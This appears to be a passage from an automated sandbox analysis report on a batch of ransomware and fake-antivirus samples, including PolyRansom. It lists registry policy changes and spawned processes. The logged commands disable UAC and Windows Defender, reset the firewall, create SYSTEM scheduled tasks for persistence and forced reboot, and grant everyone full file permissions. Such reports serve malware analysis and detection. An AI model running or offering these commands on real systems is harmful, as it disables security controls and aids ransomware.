PID 4788 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 4788 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives = "1044" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoToolbarCustomize = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMFUprogramsList = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyDocs = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSaveSettings = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Uninstall\NoAddRemovePrograms = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoUserNameInStartMenu = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetHood = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D} = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMMyPictures = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFavoritesMenu = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{450D8FBA-AD25-11D0-98A8-0800361B1103} = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuPinnedList = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuSubFolders = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStartMenuMyMusic = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoManageMyComputerVerb = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinterTabs = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPrinters = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoThemesTab = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSMHelp = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoActiveDesktop = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind = "1" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4688 -ip 4688

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 584

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\MooskccM\OgMMAEUs.exe

"C:\Users\Admin\MooskccM\OgMMAEUs.exe"

C:\ProgramData\vyQwMwog\xsskQcks.exe

"C:\ProgramData\vyQwMwog\xsskQcks.exe"

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Program Files (x86)\antiviruspc2009\avpc2009.exe

"C:\Program Files (x86)\antiviruspc2009\avpc2009.exe"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Delete /F /TN rhaegal

C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe

"C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qkQQkAAs.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4168 -ip 4168

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 480

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp

"C:\Users\Admin\AppData\Local\Temp\is-M3M1Q.tmp\is-9U52M.tmp" /SL4 $10398 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Users\Admin\AppData\Local\Temp\Fantom.exe

"C:\Users\Admin\AppData\Local\Temp\Fantom.exe"

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\winsp2up.exe

"C:\Users\Admin\AppData\Local\Temp\winsp2up.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Users\Admin\AppData\Roaming\bovdgt.exe

C:\Users\Admin\AppData\Roaming\bovdgt.exe

C:\Windows\SysWOW64\sc.exe

sc config WinDefend start= disabled

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 448

C:\Windows\SysWOW64\sc.exe

sc stop WinDefend

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ewIMoUcM.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EN2B55~1.EXE" >> NUL

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kmEAQMgw.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Program Files (x86)\VAV\vav.exe

"C:\Program Files (x86)\VAV\vav.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PCDefenderSilentSetup.msi"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Windows\SysWOW64\sc.exe

sc config WinDefend start= disabled

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\ProgramData\4749af15-06d5-4275-a22d-e0727245fc3f_31.avi", start

C:\Windows\SysWOW64\sc.exe

sc stop WinDefend

C:\WINDOWS\302746537.exe

"C:\WINDOWS\302746537.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Delete /F /TN rhaegal

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5464 -ip 5464

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Users\Admin\AppData\Local\Temp\taskdl.exe

taskdl.exe

C:\Windows\9191.tmp

"C:\Windows\9191.tmp" \\.\pipe\{E17B18FF-AF97-4E7A-AE1A-A093BD92BC40}

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3428 -ip 3428

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Program Files (x86)\Security Central\Security Central.exe

"C:\Program Files (x86)\Security Central\Security Central.exe"

C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AA98.tmp\302746537.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1961501349 && exit"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5464 -s 572

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 97761664462357.bat

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 14:57:00

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\Error file remover.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\[email protected] SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\wrkB873.tmp", start worker

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vsQAAUoU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\csgMgIsk.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\240628765.exe

"C:\Users\Admin\AppData\Local\Temp\240628765.exe"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\@[email protected]

"C:\Users\Admin\AppData\Local\Temp\@[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6408 -ip 6408

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 564

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Users\Admin\AppData\Local\Temp\[email protected]

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

C:\Users\Admin\AppData\Local\Temp\is-2M31M.tmp\is-JM222.tmp

"C:\Users\Admin\AppData\Local\Temp\is-2M31M.tmp\is-JM222.tmp" /SL4 $10606 "C:\Users\Admin\AppData\Local\Temp\[email protected]" 779923 55808

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM explorer.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MoIUIUYg.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2440 -ip 2440

C:\Users\Admin\AppData\Local\Temp\[email protected]

C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@ViraLock"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2440 -s 444

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OKYUkkcU.bat" "C:\Users\Admin\AppData\Local\Temp\[email protected]""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Endermanch@PolyRansom"

